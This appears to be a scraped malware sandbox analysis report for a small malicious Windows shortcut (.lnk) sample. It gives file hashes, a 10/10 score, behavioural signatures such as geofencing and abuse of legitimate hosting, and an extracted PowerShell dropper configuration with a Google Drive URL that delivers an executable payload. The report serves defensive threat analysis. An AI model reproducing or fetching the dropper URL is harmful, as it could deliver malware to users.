Overview

overview

10

Static

static

1

ea037f858b...18.lnk

windows7-x64

10

ea037f858b...18.lnk

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ea037f858b767baef3eb6c9eff455c83_JaffaCakes118

  • Size

    3KB

  • Sample

    240918-1f6hsavcpr

  • MD5

    ea037f858b767baef3eb6c9eff455c83

  • SHA1

    1b91f976a4458c8c315fae6b731eb80b615fd3a3

  • SHA256

    7e614a8b38ce81dc274032850bdc9e6cc41b80d6c0eaddcf5b1989add198a96b

  • SHA512

    012b033aff2a3a35d54f0be5b32b1ea7b5599cff09d9ba7a25be4f20ca697a81618d68defee97ef5dd4cf31a966802a8637a570e4e050a97441d3c622211b3dd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=17arYmcfomWk-aZSZP9P1qjMl442HppCm

Targets

    • Target

      ea037f858b767baef3eb6c9eff455c83_JaffaCakes118

    • Size

      3KB

    • MD5

      ea037f858b767baef3eb6c9eff455c83

    • SHA1

      1b91f976a4458c8c315fae6b731eb80b615fd3a3

    • SHA256

      7e614a8b38ce81dc274032850bdc9e6cc41b80d6c0eaddcf5b1989add198a96b

    • SHA512

      012b033aff2a3a35d54f0be5b32b1ea7b5599cff09d9ba7a25be4f20ca697a81618d68defee97ef5dd4cf31a966802a8637a570e4e050a97441d3c622211b3dd

    Score
    10/10

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks